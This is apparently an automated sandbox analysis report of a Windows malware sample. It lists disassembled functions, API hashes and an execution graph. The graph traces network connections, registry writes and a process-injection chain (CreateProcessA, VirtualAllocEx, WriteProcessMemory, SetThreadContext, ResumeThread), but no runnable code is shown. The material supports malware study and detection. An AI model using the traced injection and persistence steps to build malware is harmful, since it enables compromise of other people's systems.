                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@$EnvironmentExpandStrings$??2@
                                                                                            • String ID:
                                                                                            • API String ID: 612612615-0
                                                                                            • Opcode ID: 1bf054f2ccdc3be335b048ff77a64ac4bdb67295ffe3aca3d2c9ccbf2cc91127
                                                                                            • Instruction ID: 71972da321696c7643696fa2d61077c4bfdb6251f9c85b9dd911fab2e4c9aeed
                                                                                            • Opcode Fuzzy Hash: 1bf054f2ccdc3be335b048ff77a64ac4bdb67295ffe3aca3d2c9ccbf2cc91127
                                                                                            • Instruction Fuzzy Hash: EF017976D00118BADB04AB55DD41DDEB7BCEF48714B10417BF901B31D1EB746A4086A8
                                                                                            Function 00403AB1 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00402D7D: GetWindowTextLengthW.USER32(?), ref: 00402D8E
                                                                                              • Part of subcall function 00402D7D: GetWindowTextW.USER32(00402E07,00000000,00000001), ref: 00402DAB
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00413550,00413558), ref: 00403AFD
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00413550,00413558), ref: 00403B05
                                                                                            • SetWindowTextW.USER32(?,?), ref: 00403B12
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?), ref: 00403B1D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@TextWindow$Length
                                                                                            • String ID:
                                                                                            • API String ID: 2308334395-0
                                                                                            • Opcode ID: 8119ca7b33955cbac21e87e4fe12ba773d40effc5d925a3b7e480b00d6a2293b
                                                                                            • Instruction ID: 2cc122b1f520d7f8021a056a959bf32eecafdcf33a956e59961b1277582e5a57
                                                                                            • Opcode Fuzzy Hash: 8119ca7b33955cbac21e87e4fe12ba773d40effc5d925a3b7e480b00d6a2293b
                                                                                            • Instruction Fuzzy Hash: 2EF0FF32D0410DBACF01FBA5DD46CDE7B79EF04705B10406BF501720A1EA79AB559B98
                                                                                            Function 0040702A Relevance: 6.0, APIs: 4, Instructions: 34windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetObjectW.GDI32(?,0000005C,?), ref: 00407045
                                                                                            • CreateFontIndirectW.GDI32(?), ref: 0040705B
                                                                                            • GetDlgItem.USER32(?,000004B5), ref: 0040706F
                                                                                            • SendMessageW.USER32(00000000,00000030,00000000,00000000), ref: 0040707B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFontIndirectItemMessageObjectSend
                                                                                            • String ID:
                                                                                            • API String ID: 2001801573-0
                                                                                            • Opcode ID: 78def116b4819d627590729c5baad135a5410a8d7e74f17ad4cec64f2c4de15c
                                                                                            • Instruction ID: 5c236ef126686a3da9008926c30106754acf3bfa0ff8e01310dffb34f405da6a
                                                                                            • Opcode Fuzzy Hash: 78def116b4819d627590729c5baad135a5410a8d7e74f17ad4cec64f2c4de15c
                                                                                            • Instruction Fuzzy Hash: 35F05475900704ABDB209BA4DC09F8B7BFCAB48B01F048139BD51E11D4D7B4E5018B19
                                                                                            Function 00401BA3 Relevance: 6.0, APIs: 4, Instructions: 28COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetParent.USER32(?), ref: 00401BA8
                                                                                            • GetWindowRect.USER32(?,?), ref: 00401BC1
                                                                                            • ScreenToClient.USER32(00000000,?), ref: 00401BCF
                                                                                            • ScreenToClient.USER32(00000000,?), ref: 00401BD6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ClientScreen$ParentRectWindow
                                                                                            • String ID:
                                                                                            • API String ID: 2099118873-0
                                                                                            • Opcode ID: ede60c7992125a9d10b8f8c06fbaeb3be6251aeef84f0c1b655461571a46cee2
                                                                                            • Instruction ID: 3a6f634f9500a9f0e676680e31990ed58166cb62974d534a535afb1fb6b8d00a
                                                                                            • Opcode Fuzzy Hash: ede60c7992125a9d10b8f8c06fbaeb3be6251aeef84f0c1b655461571a46cee2
                                                                                            • Instruction Fuzzy Hash: 09E04F722052116BCB10AFA5AC88C8BBF6DDFC5723700447AF941A2220D7709D109A61
                                                                                            Function 00403C63 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wtol
                                                                                            • String ID: GUIFlags$[G@
                                                                                            • API String ID: 2131799477-2126219683
                                                                                            • Opcode ID: f402b0c85aba1d66b07b6addbe7eda3b1a8910d5e18cf18c534464033b9959d4
                                                                                            • Instruction ID: b6302b9691b8fcfec91ee3c39af82f4337802e9cb3a6f407b943601295de961a
                                                                                            • Opcode Fuzzy Hash: f402b0c85aba1d66b07b6addbe7eda3b1a8910d5e18cf18c534464033b9959d4
                                                                                            • Instruction Fuzzy Hash: 6DF03C3611C1635AFB342E0994187B6AA9CEB05793FE4443BE9C3F12D0C37C8E82825D
                                                                                            Function 00402F10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetEnvironmentVariableW.KERNEL32(?O@,?,00000001,004177A0,00000000,00417794,?,?,00404F3F,?,?,?,?,?), ref: 00402F26
                                                                                            • GetEnvironmentVariableW.KERNEL32(?,00000000,?,00000001,00000002,?,?,00404F3F,?,?,?,?,?), ref: 00402F52
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: EnvironmentVariable
                                                                                            • String ID: ?O@
                                                                                            • API String ID: 1431749950-3511380453
                                                                                            • Opcode ID: 0f0cab1a5fe64df75075e876fd7e6a607817ca224d69030a73e0dc08c334b9f4
                                                                                            • Instruction ID: 315e17eccb05daff3adc91fa9074d23558c2207180d60d9b2b56ce26dbf77fcb
                                                                                            • Opcode Fuzzy Hash: 0f0cab1a5fe64df75075e876fd7e6a607817ca224d69030a73e0dc08c334b9f4
                                                                                            • Instruction Fuzzy Hash: 24F06272200118BFDB00AFA9DC458AEB7EDEF88764B51402BF904D72A1D7B4AD008B98

                                                                                            Execution Graph

                                                                                            Execution Coverage:6.6%
                                                                                            Dynamic/Decrypted Code Coverage:25.8%
                                                                                            Signature Coverage:5.9%
                                                                                            Total number of Nodes:2000
                                                                                            Total number of Limit Nodes:48
                                                                                            execution_graph 70313 10003200 Sleep 70314 10020254 70313->70314 70315 100032e0 6 API calls 70316 10002d80 ResetEvent InterlockedExchange timeGetTime socket 70317 10002de8 70316->70317 70318 10002dfc lstrlenW WideCharToMultiByte 70316->70318 70370 10006815 70317->70370 70337 100067ff 70318->70337 70322 10002df6 70323 10002e59 ctype 70324 10002e60 htons connect 70323->70324 70325 10002e96 70323->70325 70324->70325 70326 10002eab setsockopt setsockopt setsockopt setsockopt 70324->70326 70327 10006815 __fltout2 5 API calls 70325->70327 70329 10002f52 InterlockedExchange 70326->70329 70330 10002f24 WSAIoctl 70326->70330 70328 10002ea5 70327->70328 70349 1000721b 70329->70349 70330->70329 70333 1000721b 748 API calls 70334 10002f91 70333->70334 70335 10006815 __fltout2 5 API calls 70334->70335 70336 10002fa6 70335->70336 70339 10006f17 70337->70339 70340 10002e22 lstrlenW WideCharToMultiByte gethostbyname 70339->70340 70345 10006f3d std::exception::exception 70339->70345 70378 10006e83 70339->70378 70395 10008550 DecodePointer 70339->70395 70340->70323 70342 10006f7b 70397 10006e24 66 API calls std::exception::operator= 70342->70397 70344 10006f85 70398 10007836 RaiseException 70344->70398 70345->70342 70396 100073e9 76 API calls __cinit 70345->70396 70348 10006f96 70350 1000722b 70349->70350 70351 1000723f 70349->70351 70434 1000710d 66 API calls __getptd_noexit 70350->70434 70407 10009754 TlsGetValue 70351->70407 70354 10007230 70435 10008702 11 API calls __wctomb_s_l 70354->70435 70359 100072a2 70436 10006e49 66 API calls 2 library calls 70359->70436 70363 100072a8 70365 10002f79 70363->70365 70437 10007133 66 API calls 3 library calls 70363->70437 70365->70333 70366 10007267 CreateThread 70366->70365 70369 1000729a GetLastError 70366->70369 70495 100071b6 70366->70495 70369->70359 70371 1000681d 70370->70371 70372 1000681f IsDebuggerPresent 70370->70372 70371->70322 70918 1000b5e6 70372->70918 70375 1000794f SetUnhandledExceptionFilter UnhandledExceptionFilter 70376 10007974 GetCurrentProcess TerminateProcess 70375->70376 70377 1000796c __call_reportfault 70375->70377 70376->70322 70377->70376 70379 10006f00 70378->70379 70387 10006e91 70378->70387 70405 10008550 DecodePointer 70379->70405 70381 10006f06 70406 1000710d 66 API calls __getptd_noexit 70381->70406 70384 10006ebf RtlAllocateHeap 70384->70387 70394 10006ef8 70384->70394 70386 10006eec 70403 1000710d 66 API calls __getptd_noexit 70386->70403 70387->70384 70387->70386 70391 10006eea 70387->70391 70392 10006e9c 70387->70392 70402 10008550 DecodePointer 70387->70402 70404 1000710d 66 API calls __getptd_noexit 70391->70404 70392->70387 70399 10008508 66 API calls __NMSG_WRITE 70392->70399 70400 10008359 66 API calls 6 library calls 70392->70400 70401 10008098 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 70392->70401 70394->70339 70395->70339 70396->70342 70397->70344 70398->70348 70399->70392 70400->70392 70402->70387 70403->70391 70404->70394 70405->70381 70406->70394 70408 10007245 70407->70408 70409 10009769 DecodePointer TlsSetValue 70407->70409 70410 10009fe4 70408->70410 70409->70408 70412 10009fed 70410->70412 70413 10007251 70412->70413 70414 1000a00b Sleep 70412->70414 70438 1000e555 70412->70438 70413->70359 70416 1000990f 70413->70416 70415 1000a020 70414->70415 70415->70412 70415->70413 70449 10009896 GetLastError 70416->70449 70418 10009917 70420 1000725e 70418->70420 70463 10008315 66 API calls 3 library calls 70418->70463 70421 100097e2 70420->70421 70465 10009db0 70421->70465 70423 100097ee GetModuleHandleW 70466 1000c144 70423->70466 70425 1000982c InterlockedIncrement 70473 10009884 70425->70473 70428 1000c144 __lock 64 API calls 70429 1000984d 70428->70429 70476 1000de7f InterlockedIncrement 70429->70476 70431 1000986b 70488 1000988d 70431->70488 70433 10009878 __lseeki64 70433->70366 70434->70354 70435->70365 70436->70363 70437->70365 70439 1000e561 70438->70439 70444 1000e57c 70438->70444 70440 1000e56d 70439->70440 70439->70444 70447 1000710d 66 API calls __getptd_noexit 70440->70447 70441 1000e58f RtlAllocateHeap 70441->70444 70443 1000e572 70443->70412 70444->70441 70446 1000e5b6 70444->70446 70448 10008550 DecodePointer 70444->70448 70446->70412 70447->70443 70448->70444 70450 10009754 ___set_flsgetvalue 3 API calls 70449->70450 70451 100098ad 70450->70451 70452 10009903 SetLastError 70451->70452 70453 10009fe4 __calloc_crt 62 API calls 70451->70453 70452->70418 70454 100098c1 70453->70454 70454->70452 70455 100098c9 DecodePointer 70454->70455 70456 100098de 70455->70456 70457 100098e2 70456->70457 70458 100098fa 70456->70458 70459 100097e2 __getptd_noexit 62 API calls 70457->70459 70464 10006e49 66 API calls 2 library calls 70458->70464 70461 100098ea GetCurrentThreadId 70459->70461 70461->70452 70462 10009900 70462->70452 70464->70462 70465->70423 70467 1000c159 70466->70467 70468 1000c16c EnterCriticalSection 70466->70468 70491 1000c082 66 API calls 9 library calls 70467->70491 70468->70425 70470 1000c15f 70470->70468 70492 10008315 66 API calls 3 library calls 70470->70492 70493 1000c06b LeaveCriticalSection 70473->70493 70475 10009846 70475->70428 70477 1000dea0 70476->70477 70478 1000de9d InterlockedIncrement 70476->70478 70479 1000deaa InterlockedIncrement 70477->70479 70480 1000dead 70477->70480 70478->70477 70479->70480 70481 1000deb7 InterlockedIncrement 70480->70481 70482 1000deba 70480->70482 70481->70482 70483 1000dec4 InterlockedIncrement 70482->70483 70485 1000dec7 70482->70485 70483->70485 70484 1000dee0 InterlockedIncrement 70484->70485 70485->70484 70486 1000defb InterlockedIncrement 70485->70486 70487 1000def0 InterlockedIncrement 70485->70487 70486->70431 70487->70485 70494 1000c06b LeaveCriticalSection 70488->70494 70490 10009894 70490->70433 70491->70470 70493->70475 70494->70490 70496 10009754 ___set_flsgetvalue 3 API calls 70495->70496 70497 100071c1 70496->70497 70510 10009734 TlsGetValue 70497->70510 70500 100071d0 70561 10009788 DecodePointer 70500->70561 70501 100071fa 70512 10009929 70501->70512 70503 10007215 70548 10007175 70503->70548 70507 100071df 70508 100071f0 GetCurrentThreadId 70507->70508 70509 100071e3 GetLastError ExitThread 70507->70509 70508->70503 70511 100071cc 70510->70511 70511->70500 70511->70501 70513 10009935 __lseeki64 70512->70513 70514 10009a37 __lseeki64 70513->70514 70515 1000994d 70513->70515 70562 10006e49 66 API calls 2 library calls 70513->70562 70514->70503 70517 1000995b 70515->70517 70563 10006e49 66 API calls 2 library calls 70515->70563 70519 10009969 70517->70519 70564 10006e49 66 API calls 2 library calls 70517->70564 70521 10009977 70519->70521 70565 10006e49 66 API calls 2 library calls 70519->70565 70523 10009985 70521->70523 70566 10006e49 66 API calls 2 library calls 70521->70566 70525 10009993 70523->70525 70567 10006e49 66 API calls 2 library calls 70523->70567 70527 100099a1 70525->70527 70568 10006e49 66 API calls 2 library calls 70525->70568 70529 100099b2 70527->70529 70569 10006e49 66 API calls 2 library calls 70527->70569 70531 1000c144 __lock 66 API calls 70529->70531 70532 100099ba 70531->70532 70533 100099df 70532->70533 70534 100099c6 InterlockedDecrement 70532->70534 70571 10009a43 LeaveCriticalSection _doexit 70533->70571 70534->70533 70535 100099d1 70534->70535 70535->70533 70570 10006e49 66 API calls 2 library calls 70535->70570 70537 100099ec 70539 1000c144 __lock 66 API calls 70537->70539 70540 100099f3 70539->70540 70541 10009a24 70540->70541 70572 1000df0e 8 API calls 70540->70572 70574 10009a4f LeaveCriticalSection _doexit 70541->70574 70544 10009a31 70575 10006e49 66 API calls 2 library calls 70544->70575 70546 10009a08 70546->70541 70573 1000dfa7 66 API calls 4 library calls 70546->70573 70549 10007181 __lseeki64 70548->70549 70550 1000990f __getptd 66 API calls 70549->70550 70551 10007186 70550->70551 70576 10002fb0 70551->70576 70586 100052d9 70551->70586 70597 100052b0 70551->70597 70608 100030c0 70551->70608 70552 10007190 70613 10007156 70552->70613 70561->70507 70562->70515 70563->70517 70564->70519 70565->70521 70566->70523 70567->70525 70568->70527 70569->70529 70570->70533 70571->70537 70572->70546 70573->70541 70574->70544 70575->70514 70577 100067ff 77 API calls 70576->70577 70585 10002fd3 70577->70585 70578 1000306d 70580 10006815 __fltout2 5 API calls 70578->70580 70579 10003014 select 70579->70578 70579->70585 70581 10003098 70580->70581 70581->70552 70582 10003032 recv 70582->70585 70584 1000710d 66 API calls __wctomb_s_l 70584->70585 70585->70578 70585->70579 70585->70582 70585->70584 70619 10003350 70585->70619 70590 100052d2 70586->70590 70587 1000536c RegOpenKeyExW RegDeleteValueW RegSetValueExW RegCloseKey 70588 100053ca 70587->70588 70589 1000543c 70587->70589 70593 10005403 OpenProcess 70588->70593 70595 1000542f Sleep 70588->70595 70701 10005820 70588->70701 70723 3040497 70589->70723 70590->70587 70593->70588 70594 10005415 GetExitCodeProcess 70593->70594 70594->70588 70595->70593 70598 1000536c RegOpenKeyExW RegDeleteValueW RegSetValueExW RegCloseKey 70597->70598 70604 100052cc 70597->70604 70599 1000543c 70598->70599 70605 100053ca 70598->70605 70607 3040497 578 API calls 70599->70607 70600 10005820 103 API calls 70600->70605 70601 10005442 70601->70552 70602 10005403 OpenProcess 70603 10005415 GetExitCodeProcess 70602->70603 70602->70605 70603->70605 70604->70598 70605->70600 70605->70602 70606 1000542f Sleep 70605->70606 70606->70602 70607->70601 70609 10003128 70608->70609 70612 100030d4 70608->70612 70609->70552 70610 100030e8 Sleep 70610->70612 70611 10003104 timeGetTime 70611->70612 70612->70609 70612->70610 70612->70611 70614 10009896 __getptd_noexit 66 API calls 70613->70614 70615 10007160 70614->70615 70616 1000716b ExitThread 70615->70616 70917 10009a58 79 API calls __freefls@4 70615->70917 70618 1000716a 70618->70616 70620 10003366 70619->70620 70631 10001100 70620->70631 70622 100034e1 70622->70585 70623 100034c6 70624 100011b0 70 API calls 70623->70624 70625 100034d8 70624->70625 70625->70585 70626 10003403 timeGetTime 70639 100011b0 70626->70639 70628 100011b0 70 API calls 70629 10003378 _memmove 70628->70629 70629->70622 70629->70623 70629->70626 70629->70628 70648 100054c0 70629->70648 70632 10001111 70631->70632 70633 1000110b 70631->70633 70680 10006ba0 70632->70680 70633->70629 70635 10001134 VirtualAlloc 70636 1000116f 70635->70636 70637 10001198 70636->70637 70638 1000118a VirtualFree 70636->70638 70637->70629 70638->70637 70640 100011bd 70639->70640 70641 100011c6 70640->70641 70642 10006ba0 __floor_pentium4 68 API calls 70640->70642 70641->70629 70643 100011ee 70642->70643 70644 10001214 70643->70644 70645 1000121b VirtualAlloc 70643->70645 70644->70629 70646 10001236 70645->70646 70647 10001247 VirtualFree 70646->70647 70647->70629 70649 100054dc 70648->70649 70673 1000580d 70648->70673 70650 10005707 VirtualAlloc 70649->70650 70651 100054e7 RegOpenKeyExW 70649->70651 70653 10005745 70650->70653 70652 10005515 RegQueryValueExW 70651->70652 70658 100055ba 70651->70658 70654 1000553a 70652->70654 70655 100055ad RegCloseKey 70652->70655 70656 100067ff 77 API calls 70653->70656 70657 100067ff 77 API calls 70654->70657 70655->70658 70661 10005758 70656->70661 70660 10005540 _memset 70657->70660 70659 100055f5 70658->70659 70672 100056f8 70658->70672 70662 100055fe VirtualFree 70659->70662 70674 10005611 _memset 70659->70674 70663 1000554d RegQueryValueExW 70660->70663 70664 10005788 RegCreateKeyW 70661->70664 70661->70672 70662->70674 70666 10005569 VirtualAlloc 70663->70666 70667 100055aa 70663->70667 70668 100057a3 RegDeleteValueW RegSetValueExW 70664->70668 70669 100057ca RegCloseKey 70664->70669 70665 1000721b 736 API calls 70670 100057f3 Sleep 70665->70670 70671 100055a5 70666->70671 70667->70655 70668->70669 70669->70672 70698 10002d10 70670->70698 70671->70667 70672->70665 70673->70629 70675 100067ff 77 API calls 70674->70675 70677 100056b1 70675->70677 70676 100056e6 ctype 70676->70629 70677->70676 70694 100060df 70677->70694 70681 10006bad 70680->70681 70683 10007d77 __ctrlfp __floor_pentium4 70680->70683 70682 10006bde 70681->70682 70681->70683 70689 10006c28 70682->70689 70691 10007a9b 67 API calls __wctomb_s_l 70682->70691 70684 10007de5 __floor_pentium4 70683->70684 70685 10007dd2 __ctrlfp 70683->70685 70687 10007dc2 70683->70687 70684->70685 70693 1000bc80 67 API calls 6 library calls 70684->70693 70685->70635 70692 1000bc2b 66 API calls 3 library calls 70687->70692 70689->70635 70691->70689 70692->70685 70693->70685 70695 100060e5 70694->70695 70696 100011b0 70 API calls 70695->70696 70697 1001fab1 GetCurrentThreadId 70696->70697 70699 10002d70 70698->70699 70700 10002d21 setsockopt CancelIo InterlockedExchange closesocket SetEvent 70698->70700 70699->70673 70700->70699 70702 1000584e _memset 70701->70702 70703 100058a2 GetSystemDirectoryA 70702->70703 70728 100059e0 95 API calls _vswprintf_s 70703->70728 70705 100058d6 GetFileAttributesA 70706 1000590b CreateProcessA 70705->70706 70707 100058eb 70705->70707 70708 10005940 VirtualAllocEx 70706->70708 70709 10005932 70706->70709 70729 100059e0 95 API calls _vswprintf_s 70707->70729 70712 1000595a WriteProcessMemory 70708->70712 70713 100059ac 70708->70713 70711 10006815 __fltout2 5 API calls 70709->70711 70715 1000593c 70711->70715 70712->70713 70716 10005972 GetThreadContext 70712->70716 70717 10006815 __fltout2 5 API calls 70713->70717 70714 10005908 70714->70706 70715->70588 70716->70713 70718 10005991 SetThreadContext 70716->70718 70719 100059b9 70717->70719 70718->70713 70720 100059bd ResumeThread 70718->70720 70719->70588 70721 10006815 __fltout2 5 API calls 70720->70721 70722 100059d7 70721->70722 70722->70588 70730 30400cd GetPEB 70723->70730 70726 30404e0 70726->70552 70727 30404a8 70727->70726 70732 30401cb 70727->70732 70728->70705 70729->70714 70731 30400e5 70730->70731 70731->70727 70733 30401e6 70732->70733 70738 30401df 70732->70738 70734 304021e VirtualAlloc 70733->70734 70733->70738 70737 3040238 70734->70737 70734->70738 70735 3040330 LoadLibraryA 70735->70737 70735->70738 70736 30403a3 70736->70738 70740 34f11f2 70736->70740 70737->70735 70737->70736 70738->70726 70741 34f11fd 70740->70741 70742 34f1202 70740->70742 70758 34f8262 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 70741->70758 70746 34f10fc 70742->70746 70745 34f1210 70745->70738 70747 34f1108 _doexit 70746->70747 70749 34f11a5 _doexit 70747->70749 70751 34f1155 70747->70751 70759 34f0f98 70747->70759 70749->70745 70751->70749 70810 34ee480 70751->70810 70758->70742 70760 34f0fa4 _doexit 70759->70760 70761 34f0fac 70760->70761 70917->70618 70918->70375 70919 6c3888b9 Sleep 70927 6c3887d0 _Yarn error_info_injector _strlen 70919->70927 70920 6c3888f2 _strlen 70924 6c388925 70920->70924 70951 6c3726c0 30 API calls 3 library calls 70920->70951 70922 6c38aa0e RaiseException EnterCriticalSection LeaveCriticalSection 70922->70927 70925 6c388980 70924->70925 70926 6c388962 70924->70926 70928 6c38892c _Yarn 70924->70928 70930 6c38aa0e 3 API calls 70925->70930 70952 6c38aa0e 70926->70952 70927->70919 70927->70920 70927->70922 70933 6c3889c9 70927->70933 70936 6c3880f0 CreateToolhelp32Snapshot 70927->70936 70963 6c388330 41 API calls 3 library calls 70928->70963 70930->70928 70935 6c3889f8 error_info_injector 70933->70935 70964 6c393a5e 70933->70964 70937 6c38810c __fread_nolock 70936->70937 70938 6c388303 70936->70938 70939 6c388122 Process32FirstW 70937->70939 70938->70927 70940 6c3882fc CloseHandle 70939->70940 70948 6c388146 _Yarn error_info_injector _strlen 70939->70948 70940->70938 70941 6c388150 WideCharToMultiByte 70941->70948 70942 6c38831d 70969 6c3726c0 30 API calls 3 library calls 70942->70969 70944 6c388322 70945 6c393a5e 29 API calls 70944->70945 70947 6c388327 70945->70947 70946 6c38aa0e RaiseException EnterCriticalSection LeaveCriticalSection 70946->70948 70948->70941 70948->70942 70948->70944 70948->70946 70949 6c388310 CloseHandle 70948->70949 70950 6c3882e2 Process32NextW 70948->70950 70949->70938 70950->70940 70950->70941 70951->70920 70954 6c38aa13 ___std_exception_copy 70952->70954 70953 6c38aa2d 70953->70928 70954->70953 70956 6c38aa2f 70954->70956 70970 6c3924cf EnterCriticalSection LeaveCriticalSection __dosmaperr 70954->70970 70957 6c38aa39 Concurrency::cancel_current_task 70956->70957 70958 6c38c2f8 70956->70958 70971 6c38d2b3 RaiseException 70957->70971 70972 6c38d2b3 RaiseException 70958->70972 70961 6c38c314 70962 6c38b51c 70963->70933 70973 6c393c9d 29 API calls __wsopen_s 70964->70973 70966 6c393a6d 70974 6c393a7b 11 API calls std::locale::_Setgloballocale 70966->70974 70968 6c393a7a 70969->70944 70970->70954 70971->70962 70972->70961 70973->70966 70974->70968 70975 6c38d159 70976 6c38d162 70975->70976 70977 6c38d167 70975->70977 70992 6c38d17c GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 70976->70992 70981 6c38d04e 70977->70981 70983 6c38d05a ___scrt_is_nonwritable_in_current_image 70981->70983 70982 6c38d069 70983->70982 70984 6c38d083 dllmain_raw 70983->70984 70989 6c38d07e __DllMainCRTStartup@12 70983->70989 70984->70982 70985 6c38d09d dllmain_crt_dispatch 70984->70985 70985->70982 70985->70989 70986 6c38d0ef 70986->70982 70987 6c38d0f8 dllmain_crt_dispatch 70986->70987 70987->70982 70988 6c38d10b dllmain_raw 70987->70988 70988->70982 70989->70986 70993 6c38cf22 119 API calls 4 library calls 70989->70993 70991 6c38d0e4 dllmain_raw 70991->70986 70992->70977 70993->70991 70994 210e0 70995 210ec ___scrt_is_nonwritable_in_current_image 70994->70995 71018 212dc IsProcessorFeaturePresent ___scrt_uninitialize_crt 70995->71018 70997 21246 71033 215d0 6 API calls 70997->71033 70999 210f3 70999->70997 71001 2111d 70999->71001 71000 2124d exit 71002 21253 _exit 71000->71002 71003 21121 _initterm_e 71001->71003 71006 2116a ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 71001->71006 71004 2113c 71003->71004 